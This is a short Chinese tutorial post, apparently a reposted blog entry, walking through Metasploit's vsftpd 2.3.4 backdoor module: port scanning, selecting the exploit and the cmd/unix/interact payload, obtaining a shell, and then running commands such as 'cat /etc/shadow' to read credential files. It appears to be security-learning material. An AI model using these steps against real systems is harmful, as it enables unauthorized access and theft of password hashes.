码迷,mamicode.com
首页 > Web开发 > 详细

漏洞利用之Metasploit使用过程

时间:2016-11-14 12:52:52      阅读:233      评论:0      收藏:0      [点我收藏+]

标签:参数   vsftpd   ons   执行   rac   etc   shadow   strong   conf   

漏洞利用之Metasploit使用过程

先扫描端口,看开放的服务,如开放ftp,版本是vsftpd 2.3.4;
使用search搜索vsftp查看是否在相应的漏洞利用exploit,输入search vsftp;
use exploit/unix/ftp/vsftpd_234_backdoor,选择exploit(tab键补齐);
设置参数show options;
set payload cmd/unix/interact选择payload(tab键补齐);
设置参数show options;
执行攻击测试,输入exploit即可,如果成功,将返回一个shell(绿色标志一般攻击有效);
即可执行命令,id,whoami,ifconfig,cat /etc/passwd,cat /etc/shadow等等。

漏洞利用之Metasploit使用过程

标签:参数   vsftpd   ons   执行   rac   etc   shadow   strong   conf   

原文地址:http://www.cnblogs.com/christychang/p/6061061.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!